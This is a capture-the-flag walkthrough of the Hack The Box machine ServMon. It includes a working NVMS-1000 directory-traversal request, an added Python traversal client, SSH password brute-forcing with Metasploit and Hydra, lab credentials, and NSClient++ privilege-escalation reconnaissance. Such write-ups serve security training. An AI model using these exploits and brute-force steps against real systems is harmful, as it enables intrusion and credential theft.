ServMon_HTB
This Machine
Overview
- ServMon is an easy Windows machine running an HTTP server that hosts an NVMS-1000 (network video monitoring management software) instance, which turns out to be vulnerable to LFI via directory traversal.
- The traversal is used to read a list of passwords left on a user's Desktop. With those credentials we can SSH to the server as a second user.
- Enumerating the system as this low-privileged user turns up the password for NSClient++ (a system monitoring agent).
- After creating an SSH tunnel, the NSClient++ web application becomes reachable.
- The application can create scripts, and those scripts run in the context of NT AUTHORITY\SYSTEM.
- The user has the right to restart the NSCP service, so after creating a malicious script the service is restarted and the command executes as SYSTEM.
SCAN
┌──(kali㉿kali)-[~]
└─$ nmap -p1-10000 -sC -sV -Pn 10.10.10.184
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-25 23:07 EST
Nmap scan report for 10.10.10.184
Host is up (0.61s latency).
Not shown: 9990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 06:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c71af681ca1778d027dbcd462a092b54 (RSA)
| 256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_ 256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
| Sat:Saturday
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.93%I=7%D=12/25%Time=658A53EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/h
SF:tml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20te
SF:xt/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\
SF:x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20
SF:XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/
SF:DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\
SF:.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20
SF:\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x
SF:20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"
SF:)%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r
SF:\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML
SF:\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/x
SF:html1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/
SF:1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\
SF:x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x2
SF:0\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(R
SF:TSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\
SF:nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\
SF:n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201
SF:\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1
SF:-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/
SF:xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x
SF:20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20
SF:\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.93%T=SSL%I=7%D=12/25%Time=658A53F6%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\x1
SF:2\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x18\xdaL\x12")%
SF:r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocu
SF:ment\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCont
SF:ent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"H
SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun
SF:d")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nD
SF:ocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -7s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-12-26T04:20:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 820.57 seconds
- nmap assessment
- Anonymous FTP login is allowed, so the first step is to log in over FTP and see what is exposed.
FTP login
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50426|)
125 Data connection already open; Transfer starting.
02-28-22 06:35PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50427|)
125 Data connection already open; Transfer starting.
02-28-22 06:36PM <DIR> Nadine
02-28-22 06:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd
ftp> anonymous
?Invalid command.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50428|)
125 Data connection already open; Transfer starting.
02-28-22 06:36PM 168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||50429|)
125 Data connection already open; Transfer starting.
100% |**************************| 168 0.47 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.29 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
02-28-22 06:36PM 182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||50431|)
125 Data connection already open; Transfer starting.
100% |**************************| 182 0.49 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.30 KiB/s)
- Inspect the retrieved files
┌──(kali㉿kali)-[~]
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
- Assessment
- Nathan's Passwords.txt was left on his Desktop, so C:\Users\Nathan\Desktop\Passwords.txt is a concrete target if we find any file-read primitive.
┌──(kali㉿kali)-[~]
└─$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
- Assessment
- Notes to do.txt lists completed and outstanding tasks for the installed monitoring applications. Items 1 and 2 (NVMS password changed, NSClient access locked down) are done; items 3 to 5 (upload the passwords, remove public access to NVMS, move the secret files to SharePoint) are not, so NVMS is still publicly reachable and the passwords file may still be lying around.
web access
- Browse to port 80 normally; it redirects to Pages/login.htm, the NVMS-1000 login page.
- Assessment
- Login with default credentials fails (consistent with item 1 of the to-do list).
- Reference:
https://www.akakagemaru.info/port/webcam-wifichange.html
- Browse to port 8443
- Assessment
- Nothing usable is displayed, so look for another route in.
Use Burp to check NVMS-1000 for the LFI vulnerability.
Checking NVMS for known vulnerabilities
┌──(kali㉿kali)-[~]
└─$ searchsploit nvms
------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack B | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 47774
Exploit: NVMS 1000 - Directory Traversal
URL: https://www.exploit-db.com/exploits/47774
Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
Codes: N/A
Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/47774.txt
┌──(kali㉿kali)-[~]
└─$ cat 47774.txt
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Burp settings
- Configure the Proxy to intercept responses as well as requests (enable the same intercept rules for responses that are enabled for requests).
Testing the vulnerability
- Send the request exactly as in the exploit text:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
- win.ini exists on every Windows installation and is readable by all users, so it is a good canary for validating the LFI.
- The note said Passwords.txt is on Nathan's Desktop, so traverse to it:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
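The same traversal driven from a script, as an added example that is not part of the original writeup or of the exploit-db PoC. It sends the request over a plain socket so the `../` segments reach the server untouched; browsers and many HTTP libraries collapse them client-side, which is why the page drives this from Burp Repeater (`curl --path-as-is` is the usual one-liner alternative). The host and port are the lab target from the scan above; the function names and the win.ini canary check are my own.

```python
"""Raw-socket directory-traversal client for the NVMS-1000 LFI (added example)."""
import socket

TRAVERSAL_DEPTH = 12  # same number of "../" as the PoC; extra levels are harmless


def build_request(host: str, target: str, depth: int = TRAVERSAL_DEPTH) -> bytes:
    """Build an HTTP/1.1 GET whose path climbs to the drive root and then into `target`.

    `target` is relative to the drive root, e.g. "windows/win.ini" or
    "Users/Nathan/Desktop/Passwords.txt". The path is emitted verbatim, no normalisation.
    """
    path = "/" + "../" * depth + target.lstrip("/")
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode("ascii")


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status_code, headers dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status_code = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status_code, headers, body


def traversal_succeeded(status_code: int, body: bytes) -> bool:
    """win.ini is a reliable canary: present on every Windows install and world-readable."""
    return status_code == 200 and b"[fonts]" in body and b"[extensions]" in body


def fetch(host: str, port: int, target: str, timeout: float = 10.0):
    """Send the traversal request over a plain TCP socket and return the parsed response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, target))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    target_host, target_port = "10.10.10.184", 80
    status, _, body = fetch(target_host, target_port, "windows/win.ini")
    print("canary read:", traversal_succeeded(status, body))
    if traversal_succeeded(status, body):
        status, _, body = fetch(target_host, target_port, "Users/Nathan/Desktop/Passwords.txt")
        print(body.decode("utf-8", errors="replace"))
```

Validate with the canary first; only once win.ini comes back does it make sense to interpret a 404 on Passwords.txt as "file not there" rather than "traversal blocked".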
SSH attempts
Using msfconsole
- Try logins with the passwords obtained through Burp above, the usernames found so far (Nadine, Nathan) and a few common account names.
┌──(kali㉿kali)-[~/ServMon]
└─$ cat passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
┌──(kali㉿kali)-[~/ServMon]
└─$ cat users.txt
Nadine
nadine
Nathan
nathan
admin
Admin
Administrator
administrator
- Attempt access with msfconsole. Note that for a plain list of passwords the option is PASS_FILE; USERPASS_FILE expects "user password" pairs, one per line (see the option descriptions below).
┌──(kali㉿kali)-[~/ServMon]
└─$ msfconsole -q
msf6 >
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.184
RHOSTS => 10.10.10.184
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE passwords.txt
USERPASS_FILE => passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   false            no        Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
DB_ALL_PASS       false            no        Add all passwords in the current database to the list
DB_ALL_USERS      false            no        Add all users in the current database to the list
DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD                           no        A specific password to authenticate with
PASS_FILE         passwords.txt    no        File containing passwords, one per line
RHOSTS            10.10.10.184     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT             22               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads (max one per host)
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE     passwords.txt    no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS      false            no        Try the username as the password for all users
USER_FILE         users.txt        no        File containing usernames, one per line
VERBOSE           false            yes       Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 10.10.10.184:22 - Starting bruteforce
[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 1 opened (10.10.16.2:35313 -> 10.10.10.184:22) at 2023-12-26 02:55:42 -0500
[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 2 opened (10.10.16.2:34081 -> 10.10.10.184:22) at 2023-12-26 02:56:08 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > showsessions
[-] Unknown command: showsessions
msf6 auxiliary(scanner/ssh/ssh_login) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1   shell windows  SSH kali @   10.10.16.2:35313 -> 10.10.10.184:22 (10.10.10.184)
2   shell windows  SSH kali @   10.10.16.2:34081 -> 10.10.10.184:22 (10.10.10.184)
Using hydra
┌──(kali㉿kali)-[~/ServMon]
└─$ hydra -L users.txt -P passwords.txt 10.10.10.184 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-26 05:33:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 56 login tries (l:8/p:7), ~4 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: nadine password: L1k3B1gBut7s@W0rk
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-26 05:33:55
┌──(kali㉿kali)-[~/ServMon]
└─$ ssh nadine@10.10.10.184
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ED25519 key fingerprint is SHA256:WctzSeuXs6dqa7LqHkfVZ38Pppc/KRlSmEvNtPlwSoQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ED25519) to the list of known hosts.
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
nadine@SERVMON C:\Users\Nadine>
Privilege Escalation
Directory enumeration
- In Program Files there is another interesting directory, NSClient++, which is the NSClient mentioned in the Notes file found over FTP.
- Next, look inside the NSClient++ directory; its configuration file nsclient.ini is readable by this user:
PS C:\Program Files\NSClient++> gc nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
; in flight - TODO
[/settings/NRPE/server]
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
[/modules]
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]
; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
- Command notes
- gc: alias for the Get-Content cmdlet, which prints the contents of a text file.
- .ini files: a simple text format used to store application settings; because the structure is so plain it is a common configuration-file format.
- Assessment
- [/settings/default] holds the NSClient++ web password (ew2x6SsGTxjRwXOT) and `allowed hosts = 127.0.0.1`. The WEBServer and NRPEServer modules therefore accept only loopback clients, which is why port 8443 gave nothing useful from the attacking host; forwarding the port over the SSH session as Nadine makes it reachable as 127.0.0.1.
- CheckExternalScripts and Scheduler are enabled and `allow arguments = true`, so the agent is already configured to run external scripts, with arguments, from its own service context.
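A small triage script for nsclient.ini, as an added example that is neither the page's code nor part of NSClient++. It automates the reading done by hand above: it pulls out the web password, decides from `allowed hosts` whether a tunnel is needed, and checks whether external scripts (and arguments to them) are enabled. SAMPLE_INI reproduces the relevant keys from the page's file; the helper names and the findings keys are mine.

```python
"""Triage an NSClient++ nsclient.ini for the settings that decide the attack path (added example)."""
import configparser
import io

# Constructed sample: the keys that matter, copied from the page's nsclient.ini.
SAMPLE_INI = """\
; in flight - TODO
[/settings/default]
password = ew2x6SsGTxjRwXOT
allowed hosts = 127.0.0.1
[/modules]
CheckHelpers = disabled
WEBServer = enabled
NRPEServer = enabled
Scheduler = enabled
CheckExternalScripts = enabled
[/settings/scheduler/schedules]
foobar = command = foobar
[/settings/external scripts]
allow arguments = true
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def load_nsclient_ini(text: str) -> configparser.ConfigParser:
    """Parse nsclient.ini. Section names look like paths and keys contain spaces,
    which configparser accepts; optionxform=str keeps the module names' case."""
    cp = configparser.ConfigParser(interpolation=None, comment_prefixes=(";", "#"), strict=False)
    cp.optionxform = str
    cp.read_file(io.StringIO(text))
    return cp


def enabled_modules(cp) -> list:
    if not cp.has_section("/modules"):
        return []
    return [name for name, state in cp["/modules"].items() if state.strip().lower() == "enabled"]


def triage(cp) -> dict:
    """Return the facts an attacker needs from the agent configuration."""
    f = {}
    if cp.has_section("/settings/default"):
        default = cp["/settings/default"]
        f["web_password"] = default.get("password")
        hosts_raw = default.get("allowed hosts", "")
    else:
        f["web_password"] = None
        hosts_raw = ""
    hosts = [h.strip() for h in hosts_raw.split(",") if h.strip()]
    f["allowed_hosts"] = hosts
    # Loopback-only: the web/NRPE ports answer on the network but reject remote
    # clients, so the web UI has to be reached through a port forward (e.g. over SSH).
    f["loopback_only"] = bool(hosts) and all(h in LOOPBACK for h in hosts)
    mods = enabled_modules(cp)
    f["enabled_modules"] = mods
    f["web_enabled"] = "WEBServer" in mods
    f["needs_tunnel"] = f["web_enabled"] and f["loopback_only"]
    f["external_scripts"] = "CheckExternalScripts" in mods
    f["allow_arguments"] = cp.getboolean("/settings/external scripts", "allow arguments", fallback=False)
    # With external scripts on and the web password known, an authenticated web user
    # can register a script that the agent will run in its own service context.
    f["script_execution_possible"] = f["external_scripts"] and f["web_password"] is not None
    return f


if __name__ == "__main__":
    for key, value in triage(load_nsclient_ini(SAMPLE_INI)).items():
        print(f"{key:26s} {value}")
```

Point it at a copy of the real file (`triage(load_nsclient_ini(open("nsclient.ini").read()))`); on this host the result is web password present, loopback-only, tunnel needed, external scripts with arguments enabled.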
Checking the nscp.exe version
- Exploit-DB has vulnerability information for nscp (NSClient++), so the installed version matters.
Exploit DB
PS C:\Program Files\NSClient++> cmd /c "C:\Program Files\NSClient++\nscp.exe" --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
- NSClient++ runs as a service in the context of NT AUTHORITY\SYSTEM, so anything it executes runs as SYSTEM.
- A prerequisite for this exploit to work is a restart of the service.
- Rohn Edwards' Get-ServiceAcl function shows how to read service permissions from PowerShell.
- It can be pulled into memory and executed with an Msxml2.XMLHTTP COM-object download cradle.
- However, access to the Service Control Manager is denied to this user, so the right to restart the service has to be assumed rather than verified.
- Get-ServiceACL.ps1
┌──(kali㉿kali)-[~/ServMon]
└─$ cat Get-ServiceACL.ps1
Add-Type @"
[System.FlagsAttribute]
public enum ServiceAccessFlags : uint
{
QueryConfig = 1,
ChangeConfig = 2,
QueryStatus = 4,
EnumerateDependents = 8,
Start = 16,
Stop = 32,
PauseContinue = 64,
Interrogate = 128,
UserDefinedControl = 256,
Delete = 65536,
ReadControl = 131072,
WriteDac = 262144,
WriteOwner = 524288,
Synchronize = 1048576,
AccessSystemSecurity = 16777216,
GenericAll = 268435456,
GenericExecute = 536870912,
GenericWrite = 1073741824,
GenericRead = 2147483648
}
"@
function Get-ServiceAcl {
[CmdletBinding(DefaultParameterSetName="ByName")]
param(
[Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true, ParameterSetName="ByName")]
[string[]] $Name,
[Parameter(Mandatory=$true, Position=0, ParameterSetName="ByDisplayName")]
[string[]] $DisplayName,
[Parameter(Mandatory=$false, Position=1)]
[string] $ComputerName = $env:COMPUTERNAME
)
# If display name was provided, get the actual service name:
switch ($PSCmdlet.ParameterSetName) {
"ByDisplayName" {
$Name = Get-Service -DisplayName $DisplayName -ComputerName $ComputerName -ErrorAction Stop |
Select-Object -ExpandProperty Name
}
}
# Make sure computer has 'sc.exe':
$ServiceControlCmd = Get-Command "$env:SystemRoot\system32\sc.exe"
if (-not $ServiceControlCmd) {
throw "Could not find $env:SystemRoot\system32\sc.exe command!"
}
# Get-Service does the work looking up the service the user requested:
Get-Service -Name $Name | ForEach-Object {
# We might need this info in catch block, so store it to a variable
$CurrentName = $_.Name
# Get SDDL using sc.exe
$Sddl = & $ServiceControlCmd.Definition "\\$ComputerName" sdshow "$CurrentName" | Where-Object { $_ }
try {
# Get the DACL from the SDDL string
$Dacl = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
}
catch {
Write-Warning "Couldn't get security descriptor for service '$CurrentName': $Sddl"
return
}
# Create the custom object with the note properties
$CustomObject = New-Object -TypeName PSObject -Property ([ordered] @{ Name = $_.Name
Dacl = $Dacl
})
# Add the 'Access' property:
$CustomObject | Add-Member -MemberType ScriptProperty -Name Access -Value {
$this.Dacl.DiscretionaryAcl | ForEach-Object {
$CurrentDacl = $_
try {
$IdentityReference = $CurrentDacl.SecurityIdentifier.Translate([System.Security.Principal.NTAccount])
}
catch {
$IdentityReference = $CurrentDacl.SecurityIdentifier.Value
}
New-Object -TypeName PSObject -Property ([ordered] @{
ServiceRights = [ServiceAccessFlags] $CurrentDacl.AccessMask
AccessControlType = $CurrentDacl.AceType
IdentityReference = $IdentityReference
IsInherited = $CurrentDacl.IsInherited
InheritanceFlags = $CurrentDacl.InheritanceFlags
                PropagationFlags = $CurrentDacl.PropagationFlags
            })
        }
    }
    # Add 'AccessToString' property that mimics a property of the same name from a normal Get-Acl call
    $CustomObject | Add-Member -MemberType ScriptProperty -Name AccessToString -Value {
        $this.Access | ForEach-Object {
            "{0} {1} {2}" -f $_.IdentityReference, $_.AccessControlType, $_.ServiceRights
        } | Out-String
    }
    $CustomObject
}
}
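Get-ServiceAcl above hands the `sc.exe sdshow` string to .NET's RawSecurityDescriptor and lets it do the decoding. The same decoding written out by hand, as an added example (mine, not Rohn Edwards' and not from the page), so an SDDL string copied from anywhere it could be read (a shell where `sc sdshow nscp` succeeds, or the service's Security registry value) can be checked offline for the Start+Stop pair the privilege escalation depends on. The SDDL at the bottom is constructed: on a typical default service DACL INTERACTIVE only gets query rights, and this sample deliberately grants it RP/WP so the check has a positive case.

```python
"""Decode a service SDDL DACL into per-principal service rights (added example)."""
import re

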